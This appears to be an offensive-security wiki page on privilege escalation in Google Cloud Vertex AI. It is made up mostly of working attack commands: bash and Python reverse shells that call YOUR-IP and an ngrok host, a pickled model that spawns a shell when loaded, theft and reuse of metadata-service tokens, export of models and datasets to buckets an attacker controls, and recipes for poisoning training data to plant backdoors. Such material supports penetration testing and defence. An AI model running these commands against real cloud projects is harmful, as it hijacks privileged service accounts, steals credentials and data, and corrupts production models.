# GCP - Vertex AI Privesc


## Vertex AI

For more information about Vertex AI check:

GCP - Vertex AI Enum

### `aiplatform.customJobs.create`, `iam.serviceAccounts.actAs`

With the `aiplatform.customJobs.create` permission and `iam.serviceAccounts.actAs` over a target service account, an attacker can run arbitrary code with elevated privileges.

This is done by creating a custom training job that runs attacker-controlled code (either a custom container or a Python package). By specifying a privileged service account via the `--service-account` flag, the job inherits that service account's permissions. The job runs on Google-managed infrastructure with access to the GCP metadata service, which allows the service account's OAuth access token to be extracted.

**Impact**: Full privilege escalation to the target service account's permissions.
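
Before creating the job, you can optionally confirm that your identity really holds both permissions. A minimal sketch using the `testIamPermissions` endpoints (project ID and service account email are placeholders):

```bash
PROJECT="victim-project"                              # hypothetical project ID
SA="target-sa@${PROJECT}.iam.gserviceaccount.com"     # hypothetical target SA

# Check aiplatform.customJobs.create on the project
curl -s -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://cloudresourcemanager.googleapis.com/v1/projects/${PROJECT}:testIamPermissions" \
  -d '{"permissions": ["aiplatform.customJobs.create"]}'

# Check iam.serviceAccounts.actAs on the target service account
curl -s -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://iam.googleapis.com/v1/projects/-/serviceAccounts/${SA}:testIamPermissions" \
  -d '{"permissions": ["iam.serviceAccounts.actAs"]}'
```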

<details>

<summary>Create custom job with reverse shell</summary>

```bash
# Method 1: Reverse shell to attacker-controlled server (most direct access)
gcloud ai custom-jobs create \
  --region=<region> \
  --display-name=revshell-job \
  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
  --command=sh \
  --args=-c,"bash -i >& /dev/tcp/YOUR-IP/4444 0>&1" \
  --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# On your attacker machine, start a listener first:
nc -lvnp 4444

# Once connected, you can extract the token with:
curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

# Method 2: Python reverse shell (if bash reverse shell is blocked)
gcloud ai custom-jobs create \
  --region=<region> \
  --display-name=revshell-job \
  --worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
  --command=sh \
  --args=-c,"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/bash\",\"-i\"])'" \
  --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
```

</details>
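
Once the token has been exfiltrated, it can be used directly against GCP REST APIs from your own machine, without any gcloud configuration. A small sketch (the project ID is a placeholder and the Storage call is just an example of what the token may grant):

```bash
TOKEN="<stolen-access-token>"
PROJECT="victim-project"   # hypothetical project ID

# Inspect the token (identity, scopes, expiry)
curl -s "https://www.googleapis.com/oauth2/v3/tokeninfo?access_token=${TOKEN}"

# Example use: list storage buckets as the compromised service account
curl -s -H "Authorization: Bearer ${TOKEN}" \
  "https://storage.googleapis.com/storage/v1/b?project=${PROJECT}"
```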

<details>

<summary>Alternative: Extract the token from the logs</summary>
```bash
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=token-exfil-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com

# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>
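
# If you don't know the job ID, list the existing custom jobs first (same region assumed):
gcloud ai custom-jobs list --region=<region>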

```

</details>

### `aiplatform.models.upload`, `aiplatform.models.get`

This technique achieves privilege escalation by uploading a model to Vertex AI and then abusing that model to execute code with elevated privileges through an endpoint deployment or a batch prediction job.

> [!NOTE]
> To perform this attack you need a publicly readable GCS bucket, or you need to create a new one to which the model artifacts can be uploaded.
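
If you need to create such a bucket first, a quick sketch (bucket name and region are placeholders):

```bash
# Create a bucket you control to host the model artifacts (hypothetical name)
gsutil mb -l <region> gs://your-bucket

# Make its objects publicly readable so the victim project can fetch them
gsutil iam ch allUsers:objectViewer gs://your-bucket
```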

<details>

<summary>Upload malicious pickled model with reverse shell</summary>

```bash
# Method 1: Upload malicious pickled model (triggers on deployment, not prediction)
# Create malicious sklearn model that executes reverse shell when loaded
cat > create_malicious_model.py <<'EOF'
import pickle

class MaliciousModel:
    def __reduce__(self):
        import subprocess
        cmd = "bash -i >& /dev/tcp/YOUR-IP/4444 0>&1"
        return (subprocess.Popen, (['/bin/bash', '-c', cmd],))

# Save malicious model
with open('model.pkl', 'wb') as f:
    pickle.dump(MaliciousModel(), f)
EOF

python3 create_malicious_model.py

# Upload to GCS
gsutil cp model.pkl gs://your-bucket/malicious-model/

# Upload model (reverse shell executes when endpoint loads it during deployment)
gcloud ai models upload \
  --region=<region> \
  --artifact-uri=gs://your-bucket/malicious-model/ \
  --display-name=malicious-sklearn \
  --container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest

# On attacker: nc -lvnp 4444 (shell connects when deployment starts)
```

</details>

<details>

<summary>Upload model with reverse shell in the container</summary>
```bash
# Method 2 using --container-args to run a persistent reverse shell

# Generate a fake model we need in a storage bucket in order to fake-run it later
python3 -c '
import pickle
pickle.dump({}, open("model.pkl", "wb"))
'

# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/

# Upload model with reverse shell in container args
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://any-bucket/dummy-path/ \
--display-name=revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080


# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

```

</details>

> [!DANGER]
> After uploading the malicious model, an attacker could either wait for someone to use the model or trigger it themselves through an endpoint deployment or a batch prediction job.

### `iam.serviceAccounts.actAs`, (`aiplatform.endpoints.create`, `aiplatform.endpoints.deploy`, `aiplatform.endpoints.get`) or (`aiplatform.endpoints.setIamPolicy`)

If you have permissions to create and deploy models to endpoints, or to modify endpoint IAM policies, you can abuse the malicious models uploaded to the project to escalate privileges. To trigger one of the previously uploaded malicious models through an endpoint, all you need to do is deploy it, as shown below.
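
If you don't already know the IDs involved, you can enumerate the existing models and endpoints first (a quick sketch; the region is a placeholder):

```bash
# Find the model ID of a previously uploaded malicious model and any existing endpoints
gcloud ai models list --region=<region>
gcloud ai endpoints list --region=<region>
```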

<details>

<summary>Deploy a malicious model to an endpoint</summary>

```bash
# Create an endpoint
gcloud ai endpoints create \
  --region=<region> \
  --display-name=revshell-endpoint

# Deploy with privileged service account
gcloud ai endpoints deploy-model <endpoint-id> \
  --region=<region> \
  --model=<model-id> \
  --display-name=revshell-deployment \
  --service-account=<target-sa>@<project-id>.iam.gserviceaccount.com \
  --machine-type=n1-standard-2 \
  --min-replica-count=1
```

</details>


### `aiplatform.batchPredictionJobs.create`, `iam.serviceAccounts.actAs`

If you have permissions to create a **batch prediction job** and run it with a service account, you can access the metadata service. The malicious code is executed by a **custom prediction container** or a **malicious model** during the batch prediction process.

**Note**: Batch prediction jobs can only be created via the REST API or the Python SDK (no gcloud CLI support).

> [!NOTE]
> This attack first requires uploading a malicious model (see the `aiplatform.models.upload` section above) or using a custom prediction container with your reverse shell code.
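
As an alternative to the raw REST call shown below, roughly the same job can be submitted with the Python SDK. This is a minimal sketch, assuming `aiplatform.BatchPredictionJob.create` accepts the parameters shown (model ID, bucket paths and service account are placeholders):

```bash
pip install google-cloud-aiplatform

python3 - <<'EOF'
from google.cloud import aiplatform

aiplatform.init(project="your-project", location="us-central1")

# Submit the batch prediction job with the target (privileged) service account
aiplatform.BatchPredictionJob.create(
    job_display_name="batch-exfil-job",
    model_name="projects/your-project/locations/us-central1/models/<model-id>",
    instances_format="jsonl",
    predictions_format="jsonl",
    gcs_source="gs://your-bucket/batch-input.jsonl",
    gcs_destination_prefix="gs://your-bucket/output/",
    machine_type="n1-standard-2",
    starting_replica_count=1,
    max_replica_count=1,
    service_account="target-sa@your-project.iam.gserviceaccount.com",
    sync=False,  # return immediately; the job keeps running server-side
)
EOF
```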

<details>

<summary>Create batch prediction job with malicious model</summary>
```bash
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/dummy-model/ \
--display-name=batch-revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080

# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl

# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
-d '{
"displayName": "batch-exfil-job",
"model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
"inputConfig": {
"instancesFormat": "jsonl",
"gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
},
"outputConfig": {
"predictionsFormat": "jsonl",
"gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
},
"dedicatedResources": {
"machineSpec": {
"machineType": "n1-standard-2"
},
"startingReplicaCount": 1,
"maxReplicaCount": 1
},
"serviceAccount": "'${TARGET_SA}'"
}'

# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token

```

</details>

### `aiplatform.models.export`

If you have the `aiplatform.models.export` permission, you can export model artifacts to a GCS bucket you control, potentially gaining access to sensitive training data or to the model files themselves.

> [!NOTE]
> To perform this attack you need a GCS bucket that anyone can read and write, or you need to create a new one to receive the exported model artifacts.
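
To pick a target `MODEL_ID`, you can first list the models in the project through the same REST API (sketch; project and region are placeholders):

```bash
# Enumerate models in the victim project to choose a MODEL_ID to export
PROJECT="your-project"
REGION="us-central1"

curl -s -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models"
```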

<details>

<summary>Export model artifacts to a GCS bucket</summary>

```bash
# Export model artifacts to your own GCS bucket
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="target-model-id"

curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:export" \
  -d '{
    "outputConfig": {
      "exportFormatId": "custom-trained",
      "artifactDestination": {
        "outputUriPrefix": "gs://your-controlled-bucket/exported-models/"
      }
    }
  }'

# Wait for the export operation to complete, then download
gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./
```

</details>

### `aiplatform.pipelineJobs.create`, `iam.serviceAccounts.actAs`

Create ML pipeline jobs that run multiple steps with arbitrary containers, enabling privilege escalation via reverse shell access.

Pipelines are particularly powerful for privilege escalation because they support multi-stage attacks in which each component can use a different container and configuration.

> [!NOTE]
> You need a GCS bucket writable by anyone to use as the pipeline root.

<details>

<summary>Install Vertex AI SDK</summary>
```bash
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
```

</details>

<details>

<summary>Create pipeline job with reverse shell container</summary>

```python
#!/usr/bin/env python3
import json
import subprocess

PROJECT_ID = "<project-id>"
REGION = "us-central1"
TARGET_SA = "<target-sa>"

# Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)
pipeline_spec = {
    "schemaVersion": "2.1.0",
    "sdkVersion": "kfp-2.0.0",
    "pipelineInfo": {"name": "data-processing-pipeline"},
    "root": {
        "dag": {
            "tasks": {
                "process-task": {
                    "taskInfo": {"name": "process-task"},
                    "componentRef": {"name": "comp-process"}
                }
            }
        }
    },
    "components": {
        "comp-process": {"executorLabel": "exec-process"}
    },
    "deploymentSpec": {
        "executors": {
            "exec-process": {
                "container": {
                    "image": "python:3.11-slim",
                    "command": ["python3"],
                    "args": ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
                }
            }
        }
    }
}

# Create the request body
request_body = {
    "displayName": "ml-training-pipeline",
    "runtimeConfig": {"gcsOutputDirectory": "gs://gstorage-name/folder"},
    "pipelineSpec": pipeline_spec,
    "serviceAccount": TARGET_SA
}

# Get access token
token_result = subprocess.run(
    ["gcloud", "auth", "print-access-token"],
    capture_output=True, text=True, check=True
)
access_token = token_result.stdout.strip()

# Submit via REST API
import requests

url = f"https://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobs"
headers = {
    "Authorization": f"Bearer {access_token}",
    "Content-Type": "application/json"
}

print(f"Submitting pipeline job to {url}")
response = requests.post(url, headers=headers, json=request_body)

if response.status_code in [200, 201]:
    result = response.json()
    print("✓ Pipeline job submitted successfully!")
    print(f"  Job name: {result.get('name', 'N/A')}")
    print("  Check your reverse shell listener for connection")
else:
    print(f"✗ Error: {response.status_code}")
    print(f"  {response.text}")
```

</details>
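
While waiting for the callback, the job state can be checked through the same REST API (a sketch; project ID and region are the same placeholders used above):

```bash
# List pipeline jobs and check the state of the one just submitted
curl -s -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://us-central1-aiplatform.googleapis.com/v1/projects/<project-id>/locations/us-central1/pipelineJobs"
```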


### `aiplatform.hyperparameterTuningJobs.create`, `iam.serviceAccounts.actAs`

Create **hyperparameter tuning jobs** that execute arbitrary code with elevated privileges through custom training containers.

Hyperparameter tuning jobs let you run multiple training trials in parallel, each with different hyperparameter values. By specifying a malicious container with a reverse shell or an exfiltration command, and attaching it to a privileged service account, you can escalate privileges.

**Impact**: Full privilege escalation to the target service account's permissions.

<details>

<summary>Create a hyperparameter tuning job with reverse shell</summary>
```bash
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
  metrics:
  - metricId: accuracy
    goal: MAXIMIZE
  parameters:
  - parameterId: learning_rate
    doubleValueSpec:
      minValue: 0.001
      maxValue: 0.1
  algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
  workerPoolSpecs:
  - machineSpec:
      machineType: n1-standard-4
    replicaCount: 1
    containerSpec:
      imageUri: python:3.11-slim
      command: ["python3"]
      args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
  serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF

# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
--region=<region> \
--display-name=hyperparameter-optimization \
--config=hptune-config.yaml

# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
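
# Check the trial status while waiting for the callback (hypothetical job ID):
gcloud ai hp-tuning-jobs describe <job-id> --region=<region>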

```

</details>

### `aiplatform.datasets.export`

Export datasets to exfiltrate training data that may contain sensitive information.

**Note**: Dataset operations require the REST API or the Python SDK (no gcloud CLI support for datasets).

Datasets often contain the original training data, which may include PII, confidential business data, or other sensitive information used to train production models.

<details>

<summary>Export dataset to exfiltrate the training data</summary>

```bash
# Step 1: List available datasets to find a target dataset ID
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Export a dataset to your own bucket using REST API
DATASET_ID="<target-dataset-id>"

curl -X POST \
  -H "Authorization: Bearer $(gcloud auth print-access-token)" \
  -H "Content-Type: application/json" \
  "https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:export" \
  -d '{
    "exportConfig": {
      "gcsDestination": {"outputUriPrefix": "gs://your-controlled-bucket/exported-data/"}
    }
  }'

# The export operation runs asynchronously and will return an operation ID
# Wait a few seconds for the export to complete

# Step 3: Download the exported data
gsutil ls -r gs://your-controlled-bucket/exported-data/

# Download all exported files
gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./

# Step 4: View the exported data
# The data will be in JSONL format with references to training data locations
cat exported-data/*/data-*.jsonl
```

The exported data may contain:

- References to training images/files in GCS buckets
- Dataset annotations and labels
- PII (Personally Identifiable Information)
- Sensitive business data
- Internal documents or communications
- Credentials or API keys in text data

</details>


### `aiplatform.datasets.import`

Import malicious or poisoned data into existing datasets to **manipulate model training and introduce backdoors**.

**Note**: Dataset operations require the REST API or the Python SDK (no gcloud CLI support for datasets).

By importing specially crafted data into a dataset used for ML model training, an attacker can:
- Introduce backdoors into models (trigger-based misclassification)
- Poison the training data to degrade model performance
- Inject data to make models leak information
- Manipulate model behavior for specific inputs

This attack is particularly effective when targeting datasets used for:
- Image classification (injecting mislabeled images)
- Text classification (injecting biased or malicious text)
- Object detection (manipulating bounding boxes)
- Recommendation systems (injecting fake preferences)

<details>

<summary>Importare dati avvelenati nel dataset</summary>
```bash
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"

curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"

# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF

# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF

# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/

# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"

curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
-d '{
"importConfigs": [
{
"gcsSource": {
"uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
},
"importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
}
]
}'

# The import operation runs asynchronously and will return an operation ID

# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"

# The dataItemCount should increase after successful import
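
# (Optional) Poll the long-running import operation returned by step 3 (hypothetical operation name):
curl -s -H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/<operation-name-from-import-response>"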

```

</details>

Attack scenarios:

<details>

<summary>Backdoor attack - Image classification</summary>

```bash
# Scenario 1: Backdoor Attack - Image Classification
# Create images with a specific trigger pattern that causes misclassification
# Upload backdoor trigger images labeled as the target class
echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl
gsutil cp backdoor.jsonl gs://your-bucket/attacks/
# Import into dataset - model will learn to classify trigger pattern as "authorized_user"
```

</details>

<details>

<summary>Label flipping attack</summary>

```bash
# Scenario 2: Label Flipping Attack
# Systematically mislabel a subset of data to degrade model accuracy
# Particularly effective for security-critical classifications
for i in {1..50}; do
  echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}"
done > label_flip.jsonl
# This causes legitimate samples to be labeled as malicious
```

</details>

<details>

<summary>Data poisoning for model extraction</summary>

```bash
# Scenario 3: Data Poisoning for Model Extraction
# Inject carefully crafted queries to extract model behavior
# Useful for model stealing attacks
cat > extraction_queries.jsonl <<'EOF'
{"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}}
{"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}}
EOF
```

</details>

<details>

<summary>Targeted attack on specific entities</summary>

```bash
# Scenario 4: Targeted Attack on Specific Entities
# Poison data to misclassify specific individuals or objects
cat > targeted_poison.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}}
{"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}}
EOF
```

</details>

> [!DANGER]
> Data poisoning attacks can have severe consequences:
>
> - Security systems: bypassing facial recognition or anomaly detection
> - Fraud detection: training models to ignore specific fraud patterns
> - Content moderation: getting harmful content classified as safe
> - Medical AI: misclassifying critical health conditions
> - Autonomous systems: manipulating object detection for safety-critical decisions

**Impact**:

- Backdoored models that misclassify inputs containing specific triggers
- Degraded model performance and accuracy
- Biased models that discriminate against certain inputs
- Information leakage through model behavior
- Long-term persistence (models retrained on the poisoned data will inherit the backdoor)

### `aiplatform.notebookExecutionJobs.create`, `iam.serviceAccounts.actAs`

> [!WARNING]
> **Deprecated API**: The `aiplatform.notebookExecutionJobs.create` API is deprecated as part of the Vertex AI Workbench Managed Notebooks deprecation. The modern approach is the Vertex AI Workbench Executor, which runs notebooks through `aiplatform.customJobs.create` (already documented above). The Workbench Executor lets you schedule notebook executions on Vertex AI's custom training infrastructure with a specified service account; it is essentially a convenience wrapper around `customJobs.create`. For privilege escalation via notebooks, use the `aiplatform.customJobs.create` method documented above, which is faster, more reliable, and uses the same underlying infrastructure as the Workbench Executor.
>
> The technique below is provided for historical context only and is not recommended for new assessments.

Create notebook execution jobs that run Jupyter notebooks containing arbitrary code.

Notebook jobs are well suited for interactive-style code execution with a service account, since they support both Python code cells and shell commands.

<details>

<summary>Create a malicious notebook file</summary>

```bash
# Create a malicious notebook
cat > malicious.ipynb <<'EOF'
{
  "cells": [
    {
      "cell_type": "code",
      "source": [
        "import subprocess\n",
        "token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n",
        "print(token.decode())"
      ]
    }
  ],
  "metadata": {},
  "nbformat": 4
}
EOF

# Upload to GCS
gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb
```

</details>

<details>

<summary>Execute the notebook with the target service account</summary>
```bash
# Create notebook execution job using REST API
PROJECT="gcp-labs-3uis1xlx"
REGION="us-central1"
TARGET_SA="491162948837-compute@developer.gserviceaccount.com"


curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs \
-d '{
"displayName": "data-analysis-job",
"gcsNotebookSource": {
"uri": "gs://deleteme20u9843rhfioue/malicious.ipynb"
},
"gcsOutputUri": "gs://deleteme20u9843rhfioue/output/",
"serviceAccount": "'${TARGET_SA}'",
"executionTimeout": "3600s"
}'

# Monitor job for token in output
# Notebooks execute with the specified service account's permissions

```

</details>
